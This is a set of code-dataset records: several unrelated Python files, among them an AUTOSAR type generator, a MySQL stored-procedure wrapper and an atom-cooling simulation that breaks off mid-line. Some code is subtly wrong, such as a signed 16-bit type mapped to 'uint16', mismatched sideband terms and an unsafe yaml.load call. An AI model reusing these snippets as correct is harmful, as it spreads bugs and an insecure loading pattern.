baseTypes.createSwBaseType('dtRef_VOID', 1, encoding = 'VOID', nativeDeclaration = 'void')\n baseTypes.createSwBaseType('boolean', 8, encoding = 'BOOLEAN', nativeDeclaration='boolean')\n baseTypes.createSwBaseType('float32', 32, encoding = 'IEEE754', nativeDeclaration = 'float32')\n baseTypes.createSwBaseType('float64', 64, encoding = 'IEEE754', nativeDeclaration = 'float64')\n baseTypes.createSwBaseType('sint8', 8, encoding = '2C', nativeDeclaration='sint8')\n baseTypes.createSwBaseType('sint16', 16, encoding = '2C', nativeDeclaration='uint16')\n baseTypes.createSwBaseType('sint32', 32, encoding = '2C', nativeDeclaration='sint32')\n baseTypes.createSwBaseType('uint8', 8, nativeDeclaration='uint8')\n baseTypes.createSwBaseType('uint16', 16, nativeDeclaration='uint16')\n baseTypes.createSwBaseType('uint32', 32, nativeDeclaration='uint32')\n ws.setRole(implTypes.ref, 'DataType')\n implTypes.createImplementationDataTypePtr('dtRef_const_VOID', '/AUTOSAR_Platform/BaseTypes/dtRef_const_VOID', swImplPolicy = 'CONST')\n implTypes.createImplementationDataTypePtr('dtRef_VOID', '/AUTOSAR_Platform/BaseTypes/dtRef_VOID')\n implTypes.createImplementationDataType('boolean', '/AUTOSAR_Platform/BaseTypes/boolean', valueTable=['FALSE', 'TRUE'], typeEmitter='Platform_Type')\n implTypes.createImplementationDataType('uint8', '/AUTOSAR_Platform/BaseTypes/uint8', lowerLimit=0, upperLimit=255, typeEmitter='Platform_Type')\n implTypes.createImplementationDataType('uint16', '/AUTOSAR_Platform/BaseTypes/uint16', lowerLimit=0, upperLimit=65535, typeEmitter='Platform_Type')\n implTypes.createImplementationDataType('uint32', '/AUTOSAR_Platform/BaseTypes/uint32', lowerLimit=0, upperLimit=4294967295, typeEmitter='Platform_Type')\n\nif __name__ == '__main__':\n ws = autosar.workspace(\"4.2.2\")\n create_autosar_platform(ws)\n autosar.util.createDcf(ws).save(dest_dir = 'autosar4', dcf_name = 'PlatformExample', file_map = {'AUTOSAR_Platform': {'root': 'DATATYPE', 'filters': ['/AUTOSAR_Platform']}})\n print(\"Done\")\n","sub_path":"examples/autosar4/davinci/platform_types.py","file_name":"platform_types.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"175907930","text":"# -*- coding: utf-8 -*-\r\n# author:shihua\r\n# coder:shihua\r\n# 这是一个具体的组合模式实现类,主要用于实现各种具体功能。\r\n\"\"\"\r\n模块介绍\r\n-------\r\n\r\n 这是一个具体的组合模式实现类,主要用于实现各种具体功能。\r\n\r\n功能\r\n----\r\n\r\n 单个组件具体实现的功能: \r\n\r\n (1)DataBaseConnect \r\n\r\n (2)StoreProcedureCall \r\n\r\n 复合组件具体实现的功能: \r\n\r\n (1)DataBaseConnect \r\n\r\n (2)StoreProcedureCall \r\n\r\n类说明\r\n-----\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n####### 载入程序包 #########################################################\r\n############################################################################\r\n\r\n\r\n\r\nfrom abc import ABCMeta,abstractmethod\r\nfrom DataAPI.composite_mode_base import *\r\nfrom DataAPI.assist_base import *\r\nimport pandas as pd\r\n\r\n\r\n\r\n####### 组合模式实现类 #####################################################\r\n### 单个组件具体实现的功能: ###\r\n### (1)DataBaseConnect ###\r\n### (2)StoreProcedureCall ###\r\n### 复合组件具体实现的功能: ###\r\n### (1)DataBaseConnect ###\r\n### (2)StoreProcedureCall ###\r\n############################################################################\r\n\r\n\r\n\r\n####### 组件实现类 ##########################################################################\r\n############################################################################################\r\n\r\n\r\n\r\nclass Component_DataBaseConnect(Component):\r\n \"\"\"\r\n 类介绍:\r\n\r\n 这是一个用于数据库连接的单功能组件\r\n 支持的数据库:\r\n (1)MySQL\r\n \"\"\"\r\n\r\n\r\n def getInstanceName(self):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个获得组件实现类名称的方法\r\n \r\n 返回:\r\n 返回 (str):组件实现类的实例名称\r\n \"\"\"\r\n\r\n return 'DataBaseConnect'\r\n\r\n\r\n def feature(self,**kwargs):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个数据库连接具体实现的方法\r\n \r\n 参数:\r\n DataBseConnect_config_dict (Dict):数据库连接配置数据\r\n\r\n 返回:\r\n 返回:使用Global放入复合组件的属性中\r\n \"\"\"\r\n\r\n print(\"Component_DataBaseConnect Done!\")\r\n ### 获取连接数据库的配置参数\r\n DataBaseConnect_config_kwargs = kwargs['DataBaseConnect_config_dict']\r\n ### 创建mysql连接\r\n global cursor\r\n global connect\r\n connect = pymysql.Connect(**DataBaseConnect_config_kwargs)\r\n ### 获取游标\r\n cursor = connect.cursor()\r\n\r\n\r\n\r\nclass Component_StoreProcedureCall(Component):\r\n \"\"\"\r\n 类介绍:\r\n\r\n 这是一个存储过程调用的具体实现类\t\r\n \"\"\"\r\n\r\n\r\n def __init__(self):\r\n \"\"\"\r\n 属性方法功能:\r\n\r\n 定义一个存储组件的数据属性\r\n \"\"\"\r\n self.data = None\r\n\r\n\r\n def getInstanceName(self):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个获得组件实现类名称的方法\r\n\r\n 返回:\r\n 返回:组件实现类的实例名称,数据类型str\r\n \"\"\"\r\n\r\n return 'StoreProcedureCall'\r\n\r\n\r\n def feature(self,**kwargs):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个存储过程调用具体实现的方法\r\n\r\n 参数:\r\n InputParameters_dict (Dict):对应存储过程的输入参数args和存储过程名字procname\r\n\r\n 返回:\r\n data (DataFrame):返回存储过程的结果\r\n \"\"\"\r\n\r\n print(\"Component_StoreProcedureCall Done!\")\r\n ### 获取构建好的游标\r\n StoreProcedureCall_cursor = kwargs['cursor']\r\n InputParameters_dict = kwargs['InputParameters_dict']\r\n args= InputParameters_dict['args']\r\n procname = InputParameters_dict['procname']\r\n StoreProcedureCall_cursor.callproc(procname = procname, args= args)\r\n # 返回获得的集合,即存储函数中的 SELECT * FROM tmp; 结果\r\n result = cursor.fetchall()\r\n columnDes = cursor.description #获取连接对象的描述信息\r\n columnNames = [columnDes[i][0] for i in range(len(columnDes))]\r\n data = pd.DataFrame.from_records(result,columns = columnNames)\r\n # print(data)\r\n\r\n return data\r\n\r\n\r\n\r\n####### 复合组件实现类 ######################################################################################\r\n############################################################################################################\r\n\r\n\r\n\r\nclass Composite_DataBaseConnect(Composite):\r\n \"\"\"\r\n 类介绍:\r\n\r\n 这是一个用于数据库连接的复合功能组件\r\n 支持的数据库:\r\n (1)MySQL\r\n \"\"\"\r\n\r\n\r\n def feature(self,run_mode,**kwargs):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个数据库连接实现的具体方法\r\n 主要使用属性���储连接对象\r\n \"\"\"\r\n\r\n super().feature(run_mode,**kwargs)\r\n self._result['connect'] = connect\r\n self._result['cursor'] = cursor \r\n print(self._result)\r\n \r\n\r\n\r\nclass Composite_StoreProcedureCall(Composite):\r\n \"\"\"\r\n 类介绍:\r\n\r\n 这是一个用于存储过程调用的复合功能组件\r\n \"\"\"\r\n\r\n\r\n def feature(self,run_mode,**kwargs):\r\n \"\"\"\r\n 方法功能:\r\n\r\n 定义一个存储过程调用的复合功能组件\r\n 主要用于执行各种存储过程\r\n \"\"\"\r\n\r\n super().feature(run_mode,**kwargs)\r\n\r\n\r\n\r\n############################################################################################################\r\n############################################################################################################\r\n\r\n\r\n","sub_path":"Packages/DataAPI/DataAPI/composite_mode_realization.py","file_name":"composite_mode_realization.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91904934","text":"import re\n\nwith open('dataset_3363_2.txt', 'r') as inf:\n x = inf.readline().strip()\n\nw = [value for value in re.findall(\"[a-zA-Z]*\", x) if value != '']\nn = [value for value in re.findall(\"[0-9]*\", x) if value != '']\n\nresult = ''\nfor i in range(len(w)):\n result += w[i] * int(n[i])\n\nwith open('output.txt', 'w') as ans:\n ans.write(result)\n","sub_path":"read_&_write_to_file.py","file_name":"read_&_write_to_file.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290267515","text":"\r\nfrom org.egedede.bureau.model import Bureau\r\nfrom org.egedede.bureau.model import Element\r\nfrom org.egedede.bureau import Configuration\r\n\r\nfrom xml.dom import minidom\r\nfrom xml.dom.minidom import getDOMImplementation\r\n\r\nclass BureauStorer:\r\n \r\n def __init__(self):\r\n self.pathManager = None\r\n \r\n def store(self,name,bureau):\r\n \r\n impl = getDOMImplementation()\r\n\r\n doc = impl.createDocument(None, \"desktop\", None)\r\n top_element = doc.documentElement\r\n text = doc.createTextNode('Some textual content.')\r\n top_element.appendChild(text) \r\n for element in bureau.elements:\r\n nom=element.nom\r\n x=element.x\r\n y=element.y\r\n commande=self.pathManager.packagePath(element.commande)\r\n icone=self.pathManager.packagePath(element.icone)\r\n cwd=self.pathManager.packagePath(element.cwd)\r\n xmlElement = doc.createElement(\"element\")\r\n xmlElement.setAttribute('nom',nom)\r\n xmlElement.setAttribute('x',str(x))\r\n xmlElement.setAttribute('y',str(y))\r\n xmlElement.setAttribute('commande',commande)\r\n xmlElement.setAttribute('icone',icone)\r\n if cwd:\r\n xmlElement.setAttribute('home',cwd)\r\n top_element.appendChild(xmlElement)\r\n # writing xml in file\r\n computedPath = Configuration.Configuration.getInstance('general').getProperty('last_session')\r\n if self.pathManager:\r\n computedPath = self.pathManager.computePath(computedPath)\r\n \r\n file_object = open(computedPath, \"w\")\r\n file_object.write(doc.toprettyxml())\r\n file_object.close()\r\n","sub_path":"branches/V0.5/org/egedede/bureau/managers/BureauStorer.py","file_name":"BureauStorer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475826356","text":"import falcon\nimport logging\nimport yaml\nimport kata.errors\n\n_app = None\ndata = None\n\ndef app():\n global _app\n if _app is None:\n _app = falcon.API()\n _app.add_error_handler(Exception, kata.errors.handler)\n\n return _app\n\ndef initialize(config_file):\n global data\n\n with open(config_file, 'r') as f:\n data = yaml.load(f.read())\n if not data:\n return\n\n data.setdefault('debug', False)\n if data.get('debug', False):\n logging.getLogger().setLevel(logging.DEBUG)\n\n if 'cache' in data:\n import kata.cache\n kata.cache.initialize(data['cache'])\n\n if 'database' in data:\n import kata.db\n kata.db.initialize(data['database'])\n\n if 'statsd' in data:\n import kata.stats\n kata.stats.initialize(data['statsd'])\n\n if 'errors' in data:\n import kata.errors\n kata.errors.initialize(data['errors'])\n\n if 'assets' in data:\n assets = data.get('assets', {})\n assets.setdefault('prefix', '/assets')\n assets_src = assets.get('src', {})\n assets_src.setdefault('css', 'assets/src/css')\n assets_src.setdefault('js', 'assets/src/js')\n assets['src'] = assets_src\n assets_build = assets.get('build', {})\n assets_build.setdefault('css', 'assets/build/css')\n assets_build.setdefault('js', 'assets/build/js')\n assets['build'] = assets_build\n data['assets'] = assets\n\n import kata.assets\n kata.assets.initialize(data['assets'])\n","sub_path":"kata/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"157670852","text":"import numpy as np \nimport scipy.stats as sts\nimport matplotlib.pyplot as plt\nimport scipy.constants as sc\nimport scipy.special as scp\nimport timeit\nstart = timeit.default_timer()\nplt.close('all')\n\nfig = plt.figure()\nax1 = plt.subplot2grid((4,4), (0,1), colspan=3, rowspan=1)\nax2 = plt.subplot2grid((4,4), (1,1), colspan=3,sharex=ax1, rowspan=2)\nax5 = plt.subplot2grid((4,4), (3,1), colspan=3,sharex=ax1, rowspan=1)\nax3 = plt.subplot2grid((4,4), (0,0), rowspan=3)\nax4 = plt.subplot2grid((4,4), (3,0), rowspan=1)\n\nE0 = 300\nBeta = 0.3\n\nRF = 5e6 # EOM's RF input \nAOM = 35e6 # \"AOM\"'s detuning \n\naa = 0.15 # Coil Radius\ns = 0.11 # Coil Separation\nCurr = 0.6805 # Current (16G/cm @ 0.6805)\nz0 = 0.173 # Position of MOT centre\n\nh = 0.0001 # Step Size\nNatoms = 100 # Atoms\nNsteps = 170 # Steps\n\nCol_Gap = 0.002 # Pinhole Diameter\nymot = 0.008 # Diameter of Cold Atoms\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' E O M & F r e q D u b t i m e '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nG = 38.11e6 \nwab = 2*np.pi*384.23e12 # Freq of transation\n\nhbar = sc.hbar # hbar\ndip = 3.485e-29 # dipole moment\nc = sc.c\nu = sc.proton_mass # Proton Mass\nM = 87*u # Mass of 87Rb\nbeta = np.linspace(0,4,80)\n\ndef EOM(RF, Beta): # [][1=Freq 0=E],AOM\n ' [0,1,2,3,4] = Center High1stSideBand Low1stSideBand High2ndSideBand... '\n Ei0 = scp.jv(0,Beta)\n Ei1 = scp.jv(1,Beta)\n Ei2 = scp.jv(2,Beta)\n Ei3 = scp.jv(3,Beta)\n F0 = wab/2 \n Fp1, Fm1 = wab/2+RF, wab/2-RF\n Fp2, Fm2 = wab/2+2*RF, wab/2-2*RF\n Fp3, Fm3 = wab/2+3*RF, wab/2-3*RF\n return [Ei0,F0],[Ei1,Fp1],[-Ei1,Fm1],[Ei2,Fp2],[Ei2,Fm2],[Ei3,Fp3],[-Ei3,Fm3]\n# -- EOM[band][E,F] --\n\nax4.plot(beta, abs(EOM(RF, beta)[0][0]),linewidth=9,c='darkviolet')\nax4.plot(beta, abs(EOM(RF, beta)[2][0]),linewidth=7,c='mediumorchid')\nax4.plot(beta, abs(EOM(RF, beta)[4][0]),linewidth=5,c='violet')\nax4.plot(beta, abs(EOM(RF, beta)[6][0]),linewidth=3,c='indigo')\nax4.axvline(Beta,c='k', linestyle='dashed')\nax4.axhline(abs(EOM(RF, Beta)[0][0]),linewidth=8,c='darkviolet', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[2][0]),linewidth=6,c='mediumorchid', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[4][0]),linewidth=4,c='violet', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[6][0]),linewidth=3,c='indigo', linestyle='dotted')\n\n# Freq and Efield together\nA0 = [EOM(RF, Beta)[0][1],EOM(RF, Beta)[0][0]]\nA1p = [EOM(RF, Beta)[1][1],EOM(RF, Beta)[1][0]]\nA1m = [EOM(RF, Beta)[2][1],EOM(RF, Beta)[2][0]]\nA2p = [EOM(RF, Beta)[3][1],EOM(RF, Beta)[3][0]]\nA2m = [EOM(RF, Beta)[4][1],EOM(RF, Beta)[4][0]]\nA3p = [EOM(RF, Beta)[5][1],EOM(RF, Beta)[5][0]]\nA3m = [EOM(RF, Beta)[6][1],EOM(RF, Beta)[6][0]]\n\n\n# Adding and multiplying all permutations\n# abcde = 1st thing 0,1p.. = 2nd thing\ne0 = [A0[0]+A0[0], A0[1]*A0[1]]\ne1p = [A0[0]+A1p[0], A0[1]*A1p[1]]\ne1m = [A0[0]+A1m[0], A0[1]*A1m[1]]\ne2p = [A0[0]+A2p[0], A0[1]*A2p[1]]\ne2m = [A0[0]+A2m[0], A0[1]*A2m[1]]\ne3p = [A0[0]+A3p[0], A0[1]*A3p[1]]\ne3m = [A0[0]+A3m[0], A0[1]*A3m[1]]\nEE = [e0,e1p,e1m,e2p,e2m,e3p,e3m]\n\na0 = [A1p[0]+A0[0], A1p[1]*A0[1]]\na1p = [A1p[0]+A1p[0], A1p[1]*A1p[1]]\na1m = [A1p[0]+A1m[0], A1p[1]*A1m[1]]\na2p = [A1p[0]+A2p[0], A1p[1]*A2p[1]]\na2m = [A1p[0]+A2m[0], A1p[1]*A2m[1]]\na3p = [A1p[0]+A3p[0], A1p[1]*A3p[1]]\na3m = [A1p[0]+A3m[0], A1p[1]*A3m[1]]\nAA = [a0,a1p,a1m,a2p,a2m,a3p,a3m]\n\nb0 = [A1m[0]+A0[0], A1m[1]*A0[1]]\nb1p = [A1m[0]+A1p[0], A1m[1]*A1p[1]]\nb1m = [A1m[0]+A1m[0], A1m[1]*A1m[1]]\nb2p = [A1m[0]+A2p[0], A1m[1]*A2p[1]]\nb2m = [A1m[0]+A2m[0], A1m[1]*A2m[1]]\nb3p = [A1m[0]+A3p[0], A1m[1]*A3p[1]]\nb3m = [A1m[0]+A3m[0], A1m[1]*A3m[1]]\nBB = [b0,b1p,b1m,b2p,b2m,b3p,b3m]\n\nc0 = [A2p[0]+A0[0], A2p[1]*A0[1]]\nc1p = [A2p[0]+A1p[0], A2p[1]*A1p[1]]\nc1m = [A2p[0]+A1m[0], A2p[1]*A1m[1]]\nc2p = [A2p[0]+A2p[0], A2p[1]*A2p[1]]\nc2m = [A2p[0]+A2m[0], A2p[1]*A2m[1]]\nc3p = [A2p[0]+A3p[0], A2p[1]*A3p[1]]\nc3m = [A2p[0]+A3m[0], A2p[1]*A3m[1]]\nCC = [c0,c1p,c1m,c2p,c2m,c3p,c3m]\n\nd0 = [A2m[0]+A0[0], A2m[1]*A0[1]]\nd1p = [A2m[0]+A1p[0], A2m[1]*A1p[1]]\nd1m = [A2m[0]+A1m[0], A2m[1]*A1m[1]]\nd2p = [A2m[0]+A2p[0], A2m[1]*A2p[1]]\nd2m = [A2m[0]+A2m[0], A2m[1]*A2m[1]]\nd3p = [A2m[0]+A3p[0], A2m[1]*A3p[1]]\nd3m = [A2m[0]+A3m[0], A2m[1]*A3m[1]]\nDD = [d0,d1p,d1m,d2p,d2m,d3p,d3m]\n\nf0 = [A3m[0]+A0[0], A3p[1]*A0[1]]\nf1p = [A3m[0]+A1p[0], A3p[1]*A1p[1]]\nf1m = [A3m[0]+A1m[0], A3p[1]*A1m[1]]\nf2p = [A3m[0]+A2p[0], A3p[1]*A2p[1]]\nf2m = [A3m[0]+A2m[0], A3p[1]*A2m[1]]\nf3p = [A3m[0]+A3p[0], A3p[1]*A3p[1]]\nf3m = [A3m[0]+A3m[0], A3p[1]*A3m[1]]\n\nFF = [f0,f1p,f1m,f2p,f2m,f3p,f3m]\ng0 = [A3m[0]+A0[0], A3m[1]*A0[1]]\ng1p = [A3m[0]+A1p[0], A3m[1]*A1p[1]]\ng1m = [A3m[0]+A1m[0], A3m[1]*A1m[1]]\ng2p = [A3m[0]+A2p[0], A3m[1]*A2p[1]]\ng2m = [A3m[0]+A2m[0], A3m[1]*A2m[1]]\ng3p = [A3m[0]+A3p[0], A3m[1]*A3p[1]]\ng3m = [A3m[0]+A3m[0], A3m[1]*A3m[1]]\nGG = [g0,g1p,g1m,g2p,g2m,g3p,g3m]\n\n\nfor j in range(7): \n ax3.scatter(EE[j][0]-AOM ,EE[j][1],s=100,alpha=0.3) \n ax3.scatter(AA[j][0]-AOM ,AA[j][1],s=100,alpha=0.3)\n ax3.scatter(BB[j][0]-AOM ,BB[j][1],s=100,alpha=0.3)\n ax3.scatter(CC[j][0]-AOM ,CC[j][1],s=100,alpha=0.3)\n ax3.scatter(DD[j][0]-AOM ,DD[j][1],s=100,alpha=0.3)\n ax3.scatter(FF[j][0]-AOM ,FF[j][1],s=100,alpha=0.3)\n ax3.scatter(GG[j][0]-AOM ,GG[j][1],s=100,alpha=0.3)\n\nBBig = np.array([a0,a1p,a1m,a2p,a2m,b0,b1p,b1m,b2p,b2m,c0,c1p,c1m,c2p,c2m,d0,d1p,d1m,d2p,d2m,e0,e1p,e1m,e2p,e2m,f0,f1p,f1m,f2p,f2m,f3p,f3m,g0,g1p,g1m,g2p,g2m,g3p,g3m])\nFlist = BBig[:,0]\nXX = [] # Index of frequency values\nfor l in range(len(BBig)):\n '''test for dups - get index symm - choose 1st'''\n x = np.where(BBig[:,0] == Flist[l])[0]\n xx = x[0]\n XX.append(x[0])\nXX_0 = list(dict.fromkeys(XX)) # Dup Prepended list\nXX_ = np.sort(XX_0)\nFplot_ = []\nfor i in range(len(XX_)):\n '''Takes the 1st index & gives freq'''\n Fplot_.append(Flist[XX_[i]])\n Fplot = np.subtract(Fplot_,AOM)\n\nJsum = []\nX0 = []\nX0_ = []\nfor I in range(len(Flist)):\n x0 = np.where(BBig[:,0] == Flist[I])[0]\n X0.append(x0)\nu =[]\nfor i in range(len(X0)):\n U=[]\n u = (X0[i])\n for j in range(len(X0[i])):\n U.append(u[j])\n X0_.append(U) \nX0_U = np.unique(X0_) # Index Prepended list\n\nYy=[]\nfor j in range(len(Fplot)):\n for l in range(len(X0_U[j])):\n y = BBig[X0_U[j][l]][1]\n Yy.append([y])\n Y = np.sum(Yy)\n Jsum.append(Y)\n Yy=[]\n\nax3.scatter(Fplot,np.square(Jsum),s=1000,c='y',alpha=0.4)\nax3.plot(Fplot,np.square(Jsum),c='y')\nax3.scatter(Fplot,Jsum,s=200,c='G',alpha=0.3)\nax3.set_xlabel('MHz',size=10)\nax3.set_ylabel('Electric Field / E0',size=15)\nax4.set_xlabel(r'$ \\beta $',size=22)\nax4.set_ylabel('Bessel Value',size=13)\nax3.grid(which='major')\nax3.set_xlim(left=min(Fplot)-2*RF, right=wab+RF*2)\nfor i in range(len(Fplot)):\n ax3.axvline(Fplot[i],alpha=0.3)\nax3.axvline(wab, c='pink',linewidth=9)\n\n\n\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n''' F O R C E L O O P '''\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \nForder = sorted(range(len(Jsum)), key=lambda kk: Fplot[kk])\n# The Index list that gives Increasing FREQUENCIES ^\nDorder = Forder[::-1] # reversed order\nD = [] # Detuning\nRabi = [] # Rabi Freq\nII = [] # II is the new IoIs = Intensity / Saturation Intensity \n\nL = len(Forder)\nfor i in range(L):\n dd = wab - Fplot[Dorder[i]]\n RR = dip*Jsum[Forder[i]]*E0/hbar\n D.append(dd)\n Rabi.append(RR)\n\nfor i in range(L):\n ii = 2*Rabi[i]**2/G**2 \n II.append(ii)\n\nw_=[]\nc1 = []\nfor i in range(L):\n ww = Fplot[Forder[i]]\n ccaa = 1+II[i]+4*D[i]**2/G**2\n w_.append(ww)\n c1.append(ccaa)\n\nw = wab - AOM # Average Freq of colliding photon\nLambda = 2*np.pi*c/w # Avg Wavelength\nk = 2*np.pi/Lambda # Average wavenumber of a momentum transfering photon\n\ndef dv(t,z,v): \n \" The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field \"# F O R C E F O R C E F O R C E F O R C E F O R C E F O R C E\n O = []\n for i in range(L):\n ooo = w_[i]/(2*np.pi*c)#-muB*MagLeak(z, z0, Curr)/hbar\n O.append(ooo)\n c2,c3 = [],[] \n for i in range(L):\n cc22 = O[i]*8*D[i]/G**2\n cc33 = 4*O[i]**2/G**2 \n c2.append(cc22)\n c3.append(cc33)\n Rho = []\n for i in range(L):\n rrr = II[i]/(c1[i]-c2[i]*v+c3[i]*v**2)\n Rho.append(rrr)\n rhoaa = np.sum(Rho)\n return -rhoaa*hbar*k*G/M/2\n\ndef dv4y(t,z,v):\n return 0\n\ndef dz(t,z,v):\n return v \n \n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n''' I N I T I A L C O N D I T I O N S '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\ndef y_vGauss(n):\n# T = 273+20\n# g = np.random.normal(loc=0.0, scale=sc.k*T/M, size=n)\n g = np.random.normal(loc=0.0, scale=0.05, size=n)\n# g = np.linspace(-1,1, n)\n return g\ndef MBrand(n):\n #x = np.random.rand(n)\n x = np.linspace(0.0001,1,n)\n kb = sc.Boltzmann # Boltzmann Constant\n u = sc.proton_mass # Proton Mass\n M = 87*u # Mass of 87Rb\n a=abs(np.sqrt((kb*370)/(M)))\n X = sts.maxwell.isf(x, scale=a)\n return X\n\n\ndef Jgen(T,n,M):\n ''' Maxwell-Boltzmann Distrb. '''\n T = 273+20\n MB=sts.maxwell\n kb=1.38e-23\n a=abs(np.sqrt((kb*T)/(M)))\n vt=MB.rvs(loc=0, scale=a, size=n, random_state=None) \n return vt\n\nVn = 10\nVx = 260\ndef vgen(n):\n ''' Linear Velocity Distrb. '''\n lin = np.linspace(Vn,Vx,n)\n return lin\n \ndef zgen(n):\n ''' Linear Coordinate Distrb. '''\n lin = np.linspace(0,0,n)\n return lin\n\n\ndef yrand(n):\n ran = np.random.random(n)\n return (ran-0.5)*2*Col_Gap\n\nv_ = np.mean(vgen(Natoms))\nRy = ((ymot-Col_Gap/2)*v_)/(z0**2+(ymot-Col_Gap/2)**2)**0.5\ndef ygen(n):\n ''' Linear Coordinate Distrb. '''\n \n #lin = np.linspace(-Col_Gap/2,Col_Gap/2,n)\n lin = np.linspace(0,0,n)\n return lin\n\ndef vyrand(n):\n ran = np.random.random(n)\n it = (ran-0.5)*2*Ry\n return it\n'''\ndef MagLeak(z, z0, Curr): \n #Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower\n x = s/2\n ZZ = -z+z0\n zz = -ZZ\n A,B = ZZ/aa, x/aa\n Q = B**2+(1+A)**2\n k = (4*A/Q)**0.5\n B0 = Curr*sc.mu_0/(2*aa)\n K = scp.ellipk(k**2)\n E = scp.ellipe(k**2) \n Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)\n Bro = np.nan_to_num(Br)\n #\n A_ = zz/aa\n Q_ = B**2+(1+A_)**2\n k_ = (4*A_/Q_)**0.5\n K_ = scp.ellipk(k_**2)\n E_ = scp.ellipe(k_**2) \n Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)\n Br_o = np.nan_to_num(Br_)\n return Br_o + Bro\n'''\ndef RK4step(ti,zi,vi,h,dv,dz): \n k11=dz(ti,zi,vi)\n k21=dv(ti,zi,vi) \n k12=dz(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)\n k22=dv(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21) \n k13=dz(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)\n k23=dv(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22) \n k14=dz(ti+h,zi +(h)*k13,vi +(h)*k23)\n k24=dv(ti+h,zi +(h)*k13,vi +(h)*k23) \n z1=zi+(h/6.0)*(k11+2.0*k12+2.0*k13+k14) \n v1=vi+(h/6.0)*(k21+2.0*k22+2.0*k23+k24) \n zi = z1\n vi = v1 \n return zi,vi\n\n\"\"\" Physical & Atomic Constants \"\"\"\nkb = sc.Boltzmann # Boltzmann Constant\nmu0 = sc.mu_0 # Vacc Permtivity\nmuB = 9.2740099*10**-24 # Borh Magnetron\n # Proton Mass\n # hbar\ndip = 3.485e-29 # dipole moment\n # speed of light\npi = np.pi # pi\n # Mass of 87Rb\n # Freq of transation\n#G = 38.11e6 # Gamma / Rate of SpE \n # dipole moment\n\n\"\"\"creation of our array of velocities\"\"\"\n#vlin=vgen(Natoms)\nzlin=zgen(Natoms)\ny_vlin=vyrand(Natoms)\n#ylin=yrand(Natoms)\nvlin=MBrand(Natoms)\nylin=zgen(Natoms)\n#y_vlin=y_vGauss(Natoms)\nzs,vs,ts=[],[],[]\nys,yvs=[],[]\nprint('Trajectorizing...')\n\"\"\"this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps\"\"\"\nfor j in range(Natoms):\n vi = vlin[j] \n zi = zlin[j]\n yvi= y_vlin[j]\n yi = ylin[j]\n for i in range(Nsteps):\n ti=h*i \n zs.append(zi)\n vs.append(vi) \n ts.append(ti) \n ys.append(yi)\n yvs.append(yvi)\n z1,v1=RK4step(ti,zi,vi,h,dv,dz)\n y1,yv1=RK4step(ti,yi,yvi,h,dv4y,dz)\n yvi = yv1\n yi = y1\n zi = z1\n vi = v1\n \nY = np.reshape(ys, (Natoms,Nsteps))\nV = np.reshape(vs, (Natoms,Nsteps))\nZ = np.reshape(zs, (Natoms,Nsteps))\ntt = np.array(ts)\nthet = np.split(tt, Natoms)[1]\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' C A P T U R E D E T E C T I O N '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\nz_ , z__ = z0 - 0.01, z0 + 0.01\ny_ = 0.01\ncapV, capv = 50,15\nn_ = []\nprint('Accumulating...')\nfor j in range(Natoms):\n for i in range(Nsteps):\n if (z_ < Z[j][i] < z__ and abs(Y[j][i]) < y_ and abs(V[j][i]) < capv):\n #Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,0.0001,Nsteps)\n nnn = 2\n n_ = np.append(n_, nnn)\n else:\n nnn = 0\n n_ = np.append(n_, nnn)\n \nN = np.reshape(n_, (Natoms, Nsteps))\nN0 = 0\nfor j in range(Natoms):\n for i in range(Nsteps):\n if N[j][i] == 2:\n N0 += 1\n break\nprint('Doing the rest...')\nprint('#Captured = ',N0)\n\nV_ = np.mean(V[:,0])\nVmp,Vrms = V_*(3*pi/8)**0.5, V_*(2*pi/8)**0.5\nprint(V_)\n\n\nCslow = 'blue'\nCslowm = 'green'\nCfastm = 'orange'\nCfast = 'red'\nvVv1 = min(V[:,0], key=lambda g:abs(g-Vmp))\nvVv1v = int(np.where(vVv1 == V[:,0])[0])\nvVv2 = min(V[:,0], key=lambda g:abs(g-V_))\nvVv2v = int(np.where(vVv2 == V[:,0])[0])\nvVv3 = min(V[:,0], key=lambda g:abs(g-Vrms))\nvVv3v = int(np.where(vVv3 == 